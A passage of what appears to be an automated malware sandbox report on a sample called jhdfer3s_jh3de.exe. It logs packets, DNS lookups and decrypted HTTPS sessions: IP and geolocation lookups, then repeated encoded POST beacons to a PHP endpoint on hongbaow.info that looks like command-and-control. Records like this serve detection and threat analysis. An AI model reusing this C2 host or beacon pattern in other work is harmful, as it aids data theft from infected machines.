                            Jan 22, 2025 08:37:00.580565929 CET50091443192.168.2.4104.21.64.1
                            Jan 22, 2025 08:37:00.580579042 CET44350091104.21.64.1192.168.2.4
                            Jan 22, 2025 08:37:00.899553061 CET44350091104.21.64.1192.168.2.4
                            Jan 22, 2025 08:37:00.899635077 CET44350091104.21.64.1192.168.2.4
                            Jan 22, 2025 08:37:00.899779081 CET50091443192.168.2.4104.21.64.1
                            Jan 22, 2025 08:37:00.900295019 CET50091443192.168.2.4104.21.64.1
                            Jan 22, 2025 08:37:00.900362015 CET44350091104.21.64.1192.168.2.4
                            Jan 22, 2025 08:37:00.916235924 CET50092443192.168.2.4104.21.64.1
                            Jan 22, 2025 08:37:00.916273117 CET44350092104.21.64.1192.168.2.4
                            Jan 22, 2025 08:37:00.916373968 CET50092443192.168.2.4104.21.64.1
                            Jan 22, 2025 08:37:00.916656017 CET50092443192.168.2.4104.21.64.1
                            Jan 22, 2025 08:37:00.916667938 CET44350092104.21.64.1192.168.2.4
                            Jan 22, 2025 08:37:01.370501995 CET44350092104.21.64.1192.168.2.4
                            Jan 22, 2025 08:37:01.370757103 CET50092443192.168.2.4104.21.64.1
                            Jan 22, 2025 08:37:01.371254921 CET50092443192.168.2.4104.21.64.1
                            Jan 22, 2025 08:37:01.371263027 CET44350092104.21.64.1192.168.2.4
                            Jan 22, 2025 08:37:01.371517897 CET50092443192.168.2.4104.21.64.1
                            Jan 22, 2025 08:37:01.371524096 CET44350092104.21.64.1192.168.2.4
                            Jan 22, 2025 08:37:01.688981056 CET44350092104.21.64.1192.168.2.4
                            Jan 22, 2025 08:37:01.689068079 CET44350092104.21.64.1192.168.2.4
                            Jan 22, 2025 08:37:01.689095974 CET50092443192.168.2.4104.21.64.1
                            Jan 22, 2025 08:37:01.689121008 CET50092443192.168.2.4104.21.64.1
                            Jan 22, 2025 08:37:01.689403057 CET50092443192.168.2.4104.21.64.1
                            Jan 22, 2025 08:37:01.689433098 CET44350092104.21.64.1192.168.2.4
                            Jan 22, 2025 08:37:01.730288029 CET50093443192.168.2.4104.21.64.1
                            Jan 22, 2025 08:37:01.730359077 CET44350093104.21.64.1192.168.2.4
                            Jan 22, 2025 08:37:01.730449915 CET50093443192.168.2.4104.21.64.1
                            Jan 22, 2025 08:37:01.730864048 CET50093443192.168.2.4104.21.64.1
                            Jan 22, 2025 08:37:01.730878115 CET44350093104.21.64.1192.168.2.4
                            Jan 22, 2025 08:37:02.190058947 CET44350093104.21.64.1192.168.2.4
                            Jan 22, 2025 08:37:02.190139055 CET50093443192.168.2.4104.21.64.1
                            Jan 22, 2025 08:37:02.191937923 CET50093443192.168.2.4104.21.64.1
                            Jan 22, 2025 08:37:02.191957951 CET44350093104.21.64.1192.168.2.4
                            Jan 22, 2025 08:37:02.192188978 CET50093443192.168.2.4104.21.64.1
                            Jan 22, 2025 08:37:02.192193985 CET44350093104.21.64.1192.168.2.4
                            Jan 22, 2025 08:37:02.508040905 CET44350093104.21.64.1192.168.2.4
                            Jan 22, 2025 08:37:02.508114100 CET50093443192.168.2.4104.21.64.1
                            Jan 22, 2025 08:37:02.508131981 CET44350093104.21.64.1192.168.2.4
                            Jan 22, 2025 08:37:02.508176088 CET50093443192.168.2.4104.21.64.1
                            Jan 22, 2025 08:37:02.508215904 CET44350093104.21.64.1192.168.2.4
                            Jan 22, 2025 08:37:02.508326054 CET50093443192.168.2.4104.21.64.1
                            Jan 22, 2025 08:37:02.508496046 CET50093443192.168.2.4104.21.64.1
                            Jan 22, 2025 08:37:02.508510113 CET44350093104.21.64.1192.168.2.4
                            Jan 22, 2025 08:37:02.525755882 CET50094443192.168.2.4104.21.64.1
                            Jan 22, 2025 08:37:02.525832891 CET44350094104.21.64.1192.168.2.4
                            Jan 22, 2025 08:37:02.525917053 CET50094443192.168.2.4104.21.64.1
                            Jan 22, 2025 08:37:02.526263952 CET50094443192.168.2.4104.21.64.1
                            Jan 22, 2025 08:37:02.526287079 CET44350094104.21.64.1192.168.2.4
                            Jan 22, 2025 08:37:03.004036903 CET44350094104.21.64.1192.168.2.4
                            Jan 22, 2025 08:37:03.004168987 CET50094443192.168.2.4104.21.64.1
                            Jan 22, 2025 08:37:03.004832029 CET50094443192.168.2.4104.21.64.1
                            Jan 22, 2025 08:37:03.004838943 CET44350094104.21.64.1192.168.2.4
                            Jan 22, 2025 08:37:03.004961014 CET50094443192.168.2.4104.21.64.1
                            Jan 22, 2025 08:37:03.004966974 CET44350094104.21.64.1192.168.2.4
                            Jan 22, 2025 08:37:03.315686941 CET44350094104.21.64.1192.168.2.4
                            Jan 22, 2025 08:37:03.315815926 CET50094443192.168.2.4104.21.64.1
                            Jan 22, 2025 08:37:03.315850973 CET44350094104.21.64.1192.168.2.4
                            Jan 22, 2025 08:37:03.315916061 CET50094443192.168.2.4104.21.64.1
                            Jan 22, 2025 08:37:03.315939903 CET44350094104.21.64.1192.168.2.4
                            Jan 22, 2025 08:37:03.315994978 CET50094443192.168.2.4104.21.64.1
                            Jan 22, 2025 08:37:03.316107035 CET50094443192.168.2.4104.21.64.1
                            Jan 22, 2025 08:37:03.316134930 CET44350094104.21.64.1192.168.2.4
                            Jan 22, 2025 08:37:03.337791920 CET50095443192.168.2.4104.21.64.1
                            Jan 22, 2025 08:37:03.337836981 CET44350095104.21.64.1192.168.2.4
                            Jan 22, 2025 08:37:03.337907076 CET50095443192.168.2.4104.21.64.1
                            Jan 22, 2025 08:37:03.338227987 CET50095443192.168.2.4104.21.64.1
                            Jan 22, 2025 08:37:03.338237047 CET44350095104.21.64.1192.168.2.4
                            Jan 22, 2025 08:37:03.802556038 CET44350095104.21.64.1192.168.2.4
                            Jan 22, 2025 08:37:03.803224087 CET50095443192.168.2.4104.21.64.1
                            Jan 22, 2025 08:37:03.804740906 CET50095443192.168.2.4104.21.64.1
                            Jan 22, 2025 08:37:03.804749966 CET44350095104.21.64.1192.168.2.4
                            Jan 22, 2025 08:37:03.804975033 CET50095443192.168.2.4104.21.64.1
                            Jan 22, 2025 08:37:03.804980993 CET44350095104.21.64.1192.168.2.4
                            Jan 22, 2025 08:37:04.115190029 CET44350095104.21.64.1192.168.2.4
                            Jan 22, 2025 08:37:04.115494013 CET44350095104.21.64.1192.168.2.4
                            Jan 22, 2025 08:37:04.115592957 CET50095443192.168.2.4104.21.64.1
                            Jan 22, 2025 08:37:04.115904093 CET50095443192.168.2.4104.21.64.1
                            Jan 22, 2025 08:37:04.115925074 CET44350095104.21.64.1192.168.2.4
                            Jan 22, 2025 08:37:04.138870955 CET50096443192.168.2.4104.21.64.1
                            Jan 22, 2025 08:37:04.138968945 CET44350096104.21.64.1192.168.2.4
                            Jan 22, 2025 08:37:04.139246941 CET50096443192.168.2.4104.21.64.1
                            Jan 22, 2025 08:37:04.139760017 CET50096443192.168.2.4104.21.64.1
                            Jan 22, 2025 08:37:04.139839888 CET44350096104.21.64.1192.168.2.4
                            Jan 22, 2025 08:37:04.595174074 CET44350096104.21.64.1192.168.2.4
                            Jan 22, 2025 08:37:04.595261097 CET50096443192.168.2.4104.21.64.1
                            Jan 22, 2025 08:37:04.596050978 CET50096443192.168.2.4104.21.64.1
                            Jan 22, 2025 08:37:04.596072912 CET44350096104.21.64.1192.168.2.4
                            Jan 22, 2025 08:37:04.596508980 CET50096443192.168.2.4104.21.64.1
                            Jan 22, 2025 08:37:04.596520901 CET44350096104.21.64.1192.168.2.4
                            Jan 22, 2025 08:37:04.666105986 CET50097443192.168.2.4104.21.64.1
                            Jan 22, 2025 08:37:04.666157961 CET44350097104.21.64.1192.168.2.4
                            Jan 22, 2025 08:37:04.666232109 CET50097443192.168.2.4104.21.64.1
                            Jan 22, 2025 08:37:04.666565895 CET50097443192.168.2.4104.21.64.1
                            Jan 22, 2025 08:37:04.666635036 CET44350097104.21.64.1192.168.2.4
                            Jan 22, 2025 08:37:04.919904947 CET44350096104.21.64.1192.168.2.4
                            Jan 22, 2025 08:37:04.919987917 CET50096443192.168.2.4104.21.64.1
                            Jan 22, 2025 08:37:04.919998884 CET44350096104.21.64.1192.168.2.4
                            Jan 22, 2025 08:37:04.920046091 CET50096443192.168.2.4104.21.64.1
                            Jan 22, 2025 08:37:05.143094063 CET44350097104.21.64.1192.168.2.4
                            Jan 22, 2025 08:37:05.147185087 CET50097443192.168.2.4104.21.64.1

                            UDP Packets

                            TimestampSource PortDest PortSource IPDest IP
                            Jan 22, 2025 08:35:00.452347040 CET5812853192.168.2.41.1.1.1
                            Jan 22, 2025 08:35:00.459959030 CET53581281.1.1.1192.168.2.4
                            Jan 22, 2025 08:35:01.178049088 CET6406853192.168.2.41.1.1.1
                            Jan 22, 2025 08:35:01.185220003 CET53640681.1.1.1192.168.2.4
                            Jan 22, 2025 08:35:01.964515924 CET5483353192.168.2.41.1.1.1
                            Jan 22, 2025 08:35:01.986627102 CET53548331.1.1.1192.168.2.4

                            DNS Queries

                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                            Jan 22, 2025 08:35:00.452347040 CET192.168.2.41.1.1.10x2a8dStandard query (0)myexternalip.comA (IP address)IN (0x0001)false
                            Jan 22, 2025 08:35:01.178049088 CET192.168.2.41.1.1.10xf8deStandard query (0)api.iplocation.netA (IP address)IN (0x0001)false
                            Jan 22, 2025 08:35:01.964515924 CET192.168.2.41.1.1.10x9fa8Standard query (0)hongbaow.infoA (IP address)IN (0x0001)false

                            DNS Answers

                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                            Jan 22, 2025 08:35:00.459959030 CET1.1.1.1192.168.2.40x2a8dNo error (0)myexternalip.com34.160.111.145A (IP address)IN (0x0001)false
                            Jan 22, 2025 08:35:01.185220003 CET1.1.1.1192.168.2.40xf8deNo error (0)api.iplocation.net172.67.68.240A (IP address)IN (0x0001)false
                            Jan 22, 2025 08:35:01.185220003 CET1.1.1.1192.168.2.40xf8deNo error (0)api.iplocation.net104.26.7.214A (IP address)IN (0x0001)false
                            Jan 22, 2025 08:35:01.185220003 CET1.1.1.1192.168.2.40xf8deNo error (0)api.iplocation.net104.26.6.214A (IP address)IN (0x0001)false
                            Jan 22, 2025 08:35:01.986627102 CET1.1.1.1192.168.2.40x9fa8No error (0)hongbaow.info104.21.64.1A (IP address)IN (0x0001)false
                            Jan 22, 2025 08:35:01.986627102 CET1.1.1.1192.168.2.40x9fa8No error (0)hongbaow.info104.21.16.1A (IP address)IN (0x0001)false
                            Jan 22, 2025 08:35:01.986627102 CET1.1.1.1192.168.2.40x9fa8No error (0)hongbaow.info104.21.48.1A (IP address)IN (0x0001)false
                            Jan 22, 2025 08:35:01.986627102 CET1.1.1.1192.168.2.40x9fa8No error (0)hongbaow.info104.21.96.1A (IP address)IN (0x0001)false
                            Jan 22, 2025 08:35:01.986627102 CET1.1.1.1192.168.2.40x9fa8No error (0)hongbaow.info104.21.112.1A (IP address)IN (0x0001)false
                            Jan 22, 2025 08:35:01.986627102 CET1.1.1.1192.168.2.40x9fa8No error (0)hongbaow.info104.21.32.1A (IP address)IN (0x0001)false
                            Jan 22, 2025 08:35:01.986627102 CET1.1.1.1192.168.2.40x9fa8No error (0)hongbaow.info104.21.80.1A (IP address)IN (0x0001)false

                            HTTP Request Dependency Graph

                            • myexternalip.com
                            • api.iplocation.net
                            • hongbaow.info

                            HTTPS Proxied Packets

                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            0192.168.2.44973134.160.111.1454437092C:\Users\user\Desktop\jhdfer3s_jh3de.exe
                            TimestampBytes transferredDirectionData
                            2025-01-22 07:35:01 UTC70OUTGET /raw HTTP/1.1
                            User-Agent: Mozilla/5.0
                            Host: myexternalip.com
                            2025-01-22 07:35:01 UTC242INHTTP/1.1 200 OK
                            date: Wed, 22 Jan 2025 07:35:00 GMT
                            content-type: text/plain; charset=utf-8
                            Content-Length: 12
                            access-control-allow-origin: *
                            via: 1.1 google
                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                            Connection: close
                            2025-01-22 07:35:01 UTC12INData Raw: 38 2e 34 36 2e 31 32 33 2e 31 38 39
                            Data Ascii: 8.46.123.189


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1192.168.2.449732172.67.68.2404437092C:\Users\user\Desktop\jhdfer3s_jh3de.exe
                            TimestampBytes transferredDirectionData
                            2025-01-22 07:35:01 UTC100OUTGET /?cmd=ip-country&ip=8.46.123.189 HTTP/1.1
                            User-Agent: Mozilla/5.0
                            Host: api.iplocation.net
                            2025-01-22 07:35:01 UTC1059INHTTP/1.1 200 OK
                            Date: Wed, 22 Jan 2025 07:35:01 GMT
                            Content-Type: application/json; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: close
                            X-Powered-By: PHP/7.4.19
                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                            Cache-Control: no-store, no-cache, must-revalidate
                            Pragma: no-cache
                            Access-Control-Allow-Origin: *
                            Set-Cookie: PHPSESSID=5dbqcpbk0ma8nuk27944fhqudi; expires=Wed, 22-Jan-2025 09:29:42 GMT; Max-Age=7200; path=/; HttpOnly
                            cf-cache-status: DYNAMIC
                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1oGQ2PEdIg0KqSAI4WJ3Vsajm9aAbXgTMsa8Gcag1KI6k%2BbGS86bDjwXuV7wJZC8oX2QZPcCrFxmXMZXZhQ0cI4P7JU3wtpCz0FP%2Bqdcg2ugoDx1gbREA%2B1vtaZRLbCG3lFiXw%3D%3D"}],"group":"cf-nel","max_age":604800}
                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                            Server: cloudflare
                            CF-RAY: 905ddd6bde324265-EWR
                            server-timing: cfL4;desc="?proto=TCP&rtt=1589&min_rtt=1584&rtt_var=604&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2832&recv_bytes=738&delivery_rate=1795817&cwnd=206&unsent_bytes=0&cid=59ae7e99847b47f2&ts=211&x=0"
                            2025-01-22 07:35:01 UTC214INData Raw: 64 30 0d 0a 7b 22 69 70 22 3a 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 22 69 70 5f 6e 75 6d 62 65 72 22 3a 22 31 33 37 32 36 34 30 36 31 22 2c 22 69 70 5f 76 65 72 73 69 6f 6e 22 3a 34 2c 22 63 6f 75 6e 74 72 79 5f 6e 61 6d 65 22 3a 22 55 6e 69 74 65 64 20 53 74 61 74 65 73 20 6f 66 20 41 6d 65 72 69 63 61 22 2c 22 63 6f 75 6e 74 72 79 5f 63 6f 64 65 32 22 3a 22 55 53 22 2c 22 69 73 70 22 3a 22 43 65 6e 74 75 72 79 4c 69 6e 6b 20 43 6f 6d 6d 75 6e 69 63 61 74 69 6f 6e 73 20 4c 4c 43 22 2c 22 72 65 73 70 6f 6e 73 65 5f 63 6f 64 65 22 3a 22 32 30 30 22 2c 22 72 65 73 70 6f 6e 73 65 5f 6d 65 73 73 61 67 65 22 3a 22 4f 4b 22 7d 0d 0a
                            Data Ascii: d0{"ip":"8.46.123.189","ip_number":"137264061","ip_version":4,"country_name":"United States of America","country_code2":"US","isp":"CenturyLink Communications LLC","response_code":"200","response_message":"OK"}
                            2025-01-22 07:35:01 UTC5INData Raw: 30 0d 0a 0d 0a
                            Data Ascii: 0


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            2192.168.2.449733104.21.64.14437092C:\Users\user\Desktop\jhdfer3s_jh3de.exe
                            TimestampBytes transferredDirectionData
                            2025-01-22 07:35:02 UTC197OUTPOST /1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            User-Agent: Mozilla/5.0
                            Host: hongbaow.info
                            Content-Length: 313
                            Cache-Control: no-cache
                            2025-01-22 07:35:02 UTC313OUTData Raw: 75 65 64 66 3d 37 58 77 67 48 41 36 45 2f 61 53 71 45 31 6d 51 6b 4a 62 31 46 6b 44 4f 4c 6f 78 4a 33 44 37 4f 63 67 72 57 42 69 6a 67 31 4a 78 65 76 45 31 35 2f 50 53 67 48 6f 2f 6e 31 78 33 34 78 44 4f 4c 6d 6a 47 35 43 4f 58 4f 77 71 71 61 68 70 57 47 59 4f 4b 52 78 41 3d 3d 23 2a 2a 23 4c 37 72 64 48 37 6e 43 45 58 35 66 6e 6b 7a 2f 62 71 61 6a 34 57 45 76 47 56 69 58 58 36 78 62 75 78 34 6f 31 78 4a 44 39 77 73 3d 23 2a 2a 23 72 48 65 56 52 6c 52 36 39 4a 62 2f 6a 50 65 37 58 72 54 44 78 69 55 73 47 73 68 64 34 53 76 65 7a 4c 35 52 4a 33 33 6c 75 43 45 3d 23 2a 2a 23 2f 36 6e 6e 75 4e 53 39 54 78 47 59 4c 67 2b 4e 4c 44 6e 2b 6d 41 3d 3d 23 2a 2a 23 65 34 65 39 6f 61 79 64 43 56 64 48 4c 39 36 46 71 48 4c 70 68 51 3d 3d 23 2a 2a 23 46 7a 2b 56 62 78
                            Data Ascii: uedf=7XwgHA6E/aSqE1mQkJb1FkDOLoxJ3D7OcgrWBijg1JxevE15/PSgHo/n1x34xDOLmjG5COXOwqqahpWGYOKRxA==#**#L7rdH7nCEX5fnkz/bqaj4WEvGViXX6xbux4o1xJD9ws=#**#rHeVRlR69Jb/jPe7XrTDxiUsGshd4SvezL5RJ33luCE=#**#/6nnuNS9TxGYLg+NLDn+mA==#**#e4e9oaydCVdHL96FqHLphQ==#**#Fz+Vbx
                            2025-01-22 07:35:02 UTC808INHTTP/1.1 200 OK
                            Date: Wed, 22 Jan 2025 07:35:02 GMT
                            Content-Type: text/html; charset=utf-8
                            Transfer-Encoding: chunked
                            Connection: close
                            X-Powered-By: PHP/7.4.33
                            cf-cache-status: DYNAMIC
                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5tY08WDRIx2rCg3sD7xfXlBjeuCBN%2FNfLW5MVohJBtWcIwIFDhp8XH283XX7MWPHK7rrVFezvy0c%2FeXgRIHWEyV5RQgNnJhAXHGIdcYc1A9kMcPMt03vvoZvGy8%2Bn4mR"}],"group":"cf-nel","max_age":604800}
                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                            Server: cloudflare
                            CF-RAY: 905ddd717ba6de95-EWR
                            alt-svc: h3=":443"; ma=86400
                            server-timing: cfL4;desc="?proto=TCP&rtt=1453&min_rtt=1441&rtt_var=566&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2830&recv_bytes=1170&delivery_rate=1891191&cwnd=246&unsent_bytes=0&cid=361af0feb46c1521&ts=385&x=0"
                            2025-01-22 07:35:02 UTC5INData Raw: 30 0d 0a 0d 0a
                            Data Ascii: 0


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            3192.168.2.449734104.21.64.14437092C:\Users\user\Desktop\jhdfer3s_jh3de.exe
                            TimestampBytes transferredDirectionData
                            2025-01-22 07:35:02 UTC196OUTPOST /1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            User-Agent: Mozilla/5.0
                            Host: hongbaow.info
                            Content-Length: 96
                            Cache-Control: no-cache
                            2025-01-22 07:35:02 UTC96OUTData Raw: 75 69 66 62 61 73 69 3d 37 58 77 67 48 41 36 45 2f 61 53 71 45 31 6d 51 6b 4a 62 31 46 6b 44 4f 4c 6f 78 4a 33 44 37 4f 63 67 72 57 42 69 6a 67 31 4a 78 65 76 45 31 35 2f 50 53 67 48 6f 2f 6e 31 78 33 34 78 44 4f 4c 6d 6a 47 35 43 4f 58 4f 77 71 71 61 68 70 57 47 59 4f 4b 52 78 41 3d 3d
                            Data Ascii: uifbasi=7XwgHA6E/aSqE1mQkJb1FkDOLoxJ3D7OcgrWBijg1JxevE15/PSgHo/n1x34xDOLmjG5COXOwqqahpWGYOKRxA==
                            2025-01-22 07:35:02 UTC830INHTTP/1.1 200 OK
                            Date: Wed, 22 Jan 2025 07:35:02 GMT
                            Content-Type: text/html; charset=utf-8
                            Transfer-Encoding: chunked
                            Connection: close
                            X-Powered-By: PHP/7.4.33
                            Vary: Accept-Encoding
                            cf-cache-status: DYNAMIC
                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=M3vPPNbWApmLNFLHqlX7ReWpLBsXE3w30kqyMWTbmeOb8JnVVI4DYtsMhtvfetmgkHx6mN2fIFgBDUiqJ8Mg3%2FnkoMd6EpWNwVmqly1y17%2BabcixyejvcO57qaRWo%2Fsa"}],"group":"cf-nel","max_age":604800}
                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                            Server: cloudflare
                            CF-RAY: 905ddd719ca48ca5-EWR
                            alt-svc: h3=":443"; ma=86400
                            server-timing: cfL4;desc="?proto=TCP&rtt=1743&min_rtt=1728&rtt_var=678&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2830&recv_bytes=952&delivery_rate=1580086&cwnd=237&unsent_bytes=0&cid=3fff776737509358&ts=403&x=0"
                            2025-01-22 07:35:02 UTC274INData Raw: 31 30 62 0d 0a 3c 62 72 20 2f 3e 0a 3c 62 3e 46 61 74 61 6c 20 65 72 72 6f 72 3c 2f 62 3e 3a 20 20 55 6e 63 61 75 67 68 74 20 45 72 72 6f 72 3a 20 43 61 6c 6c 20 74 6f 20 61 20 6d 65 6d 62 65 72 20 66 75 6e 63 74 69 6f 6e 20 62 69 6e 64 5f 70 61 72 61 6d 28 29 20 6f 6e 20 62 6f 6f 6c 20 69 6e 20 2f 76 61 72 2f 77 77 77 2f 68 74 6d 6c 2f 31 57 72 43 56 7a 57 34 6b 53 44 4e 62 4e 54 74 2f 63 71 57 66 34 76 51 6c 6f 66 7a 71 46 6b 63 37 2e 70 68 70 3a 39 35 0a 53 74 61 63 6b 20 74 72 61 63 65 3a 0a 23 30 20 7b 6d 61 69 6e 7d 0a 20 20 74 68 72 6f 77 6e 20 69 6e 20 3c 62 3e 2f 76 61 72 2f 77 77 77 2f 68 74 6d 6c 2f 31 57 72 43 56 7a 57 34 6b 53 44 4e 62 4e 54 74 2f 63 71 57 66 34 76 51 6c 6f 66 7a 71 46 6b 63 37 2e 70 68 70 3c 2f 62 3e 20 6f 6e 20 6c 69 6e 65
                            Data Ascii: 10b<br /><b>Fatal error</b>: Uncaught Error: Call to a member function bind_param() on bool in /var/www/html/1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.php:95Stack trace:#0 {main} thrown in <b>/var/www/html/1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.php</b> on line
                            2025-01-22 07:35:02 UTC5INData Raw: 30 0d 0a 0d 0a
                            Data Ascii: 0


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            4192.168.2.449735104.21.64.14437092C:\Users\user\Desktop\jhdfer3s_jh3de.exe
                            TimestampBytes transferredDirectionData
                            2025-01-22 07:35:03 UTC196OUTPOST /1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            User-Agent: Mozilla/5.0
                            Host: hongbaow.info
                            Content-Length: 96
                            Cache-Control: no-cache
                            2025-01-22 07:35:03 UTC96OUTData Raw: 66 75 66 6f 6b 69 6e 3d 37 58 77 67 48 41 36 45 2f 61 53 71 45 31 6d 51 6b 4a 62 31 46 6b 44 4f 4c 6f 78 4a 33 44 37 4f 63 67 72 57 42 69 6a 67 31 4a 78 65 76 45 31 35 2f 50 53 67 48 6f 2f 6e 31 78 33 34 78 44 4f 4c 6d 6a 47 35 43 4f 58 4f 77 71 71 61 68 70 57 47 59 4f 4b 52 78 41 3d 3d
                            Data Ascii: fufokin=7XwgHA6E/aSqE1mQkJb1FkDOLoxJ3D7OcgrWBijg1JxevE15/PSgHo/n1x34xDOLmjG5COXOwqqahpWGYOKRxA==
                            2025-01-22 07:35:03 UTC813INHTTP/1.1 200 OK
                            Date: Wed, 22 Jan 2025 07:35:03 GMT
                            Content-Type: text/html; charset=utf-8
                            Transfer-Encoding: chunked
                            Connection: close
                            X-Powered-By: PHP/7.4.33
                            cf-cache-status: DYNAMIC
                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yP5bLH2DpIMIipZccuE635g1%2BlHwIvtaKUekaMQPWmy%2BkMPO1i5%2FX3G6j1ZSWiA%2FCRcyh3f%2BkGDueytu8RO74lADyiWb4ccLNT1I%2Fvf8du4PiCDmcTkIhqJgNbxzxuXt"}],"group":"cf-nel","max_age":604800}
                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                            Server: cloudflare
                            CF-RAY: 905ddd768e528ca5-EWR
                            alt-svc: h3=":443"; ma=86400
                            server-timing: cfL4;desc="?proto=TCP&rtt=1778&min_rtt=1770&rtt_var=680&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2828&recv_bytes=952&delivery_rate=1591280&cwnd=237&unsent_bytes=0&cid=ef83744877ab53c7&ts=329&x=0"
                            2025-01-22 07:35:03 UTC5INData Raw: 30 0d 0a 0d 0a
                            Data Ascii: 0


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            5192.168.2.449736104.21.64.14437092C:\Users\user\Desktop\jhdfer3s_jh3de.exe
                            TimestampBytes transferredDirectionData
                            2025-01-22 07:35:07 UTC196OUTPOST /1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            User-Agent: Mozilla/5.0
                            Host: hongbaow.info
                            Content-Length: 96
                            Cache-Control: no-cache
                            2025-01-22 07:35:07 UTC96OUTData Raw: 66 75 66 6f 6b 69 6e 3d 37 58 77 67 48 41 36 45 2f 61 53 71 45 31 6d 51 6b 4a 62 31 46 6b 44 4f 4c 6f 78 4a 33 44 37 4f 63 67 72 57 42 69 6a 67 31 4a 78 65 76 45 31 35 2f 50 53 67 48 6f 2f 6e 31 78 33 34 78 44 4f 4c 6d 6a 47 35 43 4f 58 4f 77 71 71 61 68 70 57 47 59 4f 4b 52 78 41 3d 3d
                            Data Ascii: fufokin=7XwgHA6E/aSqE1mQkJb1FkDOLoxJ3D7OcgrWBijg1JxevE15/PSgHo/n1x34xDOLmjG5COXOwqqahpWGYOKRxA==
                            2025-01-22 07:35:07 UTC805INHTTP/1.1 200 OK
                            Date: Wed, 22 Jan 2025 07:35:07 GMT
                            Content-Type: text/html; charset=utf-8
                            Transfer-Encoding: chunked
                            Connection: close
                            X-Powered-By: PHP/7.4.33
                            cf-cache-status: DYNAMIC
                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=L4GDQ2qlHZ7OXWDo0korFy4BOj5ZIlHBLl0HLx7bQ%2Fc1wenFuecYekadDqmb8CYCKdL7a%2FcNGzCQQNfvQv5iAEZB0o81DWqneHYBcJFrDTOVRIX7OuAdW4gzNMVxQs6a"}],"group":"cf-nel","max_age":604800}
                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                            Server: cloudflare
                            CF-RAY: 905ddd8e3ed1c358-EWR
                            alt-svc: h3=":443"; ma=86400
                            server-timing: cfL4;desc="?proto=TCP&rtt=1482&min_rtt=1474&rtt_var=570&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2828&recv_bytes=952&delivery_rate=1891191&cwnd=155&unsent_bytes=0&cid=eb7333b625f51e14&ts=329&x=0"
                            2025-01-22 07:35:07 UTC5INData Raw: 30 0d 0a 0d 0a
                            Data Ascii: 0


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            6192.168.2.449737104.21.64.14437092C:\Users\user\Desktop\jhdfer3s_jh3de.exe
                            TimestampBytes transferredDirectionData
                            2025-01-22 07:35:08 UTC197OUTPOST /1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            User-Agent: Mozilla/5.0
                            Host: hongbaow.info
                            Content-Length: 313
                            Cache-Control: no-cache
                            2025-01-22 07:35:08 UTC313OUTData Raw: 75 65 64 66 3d 37 58 77 67 48 41 36 45 2f 61 53 71 45 31 6d 51 6b 4a 62 31 46 6b 44 4f 4c 6f 78 4a 33 44 37 4f 63 67 72 57 42 69 6a 67 31 4a 78 65 76 45 31 35 2f 50 53 67 48 6f 2f 6e 31 78 33 34 78 44 4f 4c 6d 6a 47 35 43 4f 58 4f 77 71 71 61 68 70 57 47 59 4f 4b 52 78 41 3d 3d 23 2a 2a 23 4c 37 72 64 48 37 6e 43 45 58 35 66 6e 6b 7a 2f 62 71 61 6a 34 57 45 76 47 56 69 58 58 36 78 62 75 78 34 6f 31 78 4a 44 39 77 73 3d 23 2a 2a 23 72 48 65 56 52 6c 52 36 39 4a 62 2f 6a 50 65 37 58 72 54 44 78 69 55 73 47 73 68 64 34 53 76 65 7a 4c 35 52 4a 33 33 6c 75 43 45 3d 23 2a 2a 23 2f 36 6e 6e 75 4e 53 39 54 78 47 59 4c 67 2b 4e 4c 44 6e 2b 6d 41 3d 3d 23 2a 2a 23 65 34 65 39 6f 61 79 64 43 56 64 48 4c 39 36 46 71 48 4c 70 68 51 3d 3d 23 2a 2a 23 46 7a 2b 56 62 78
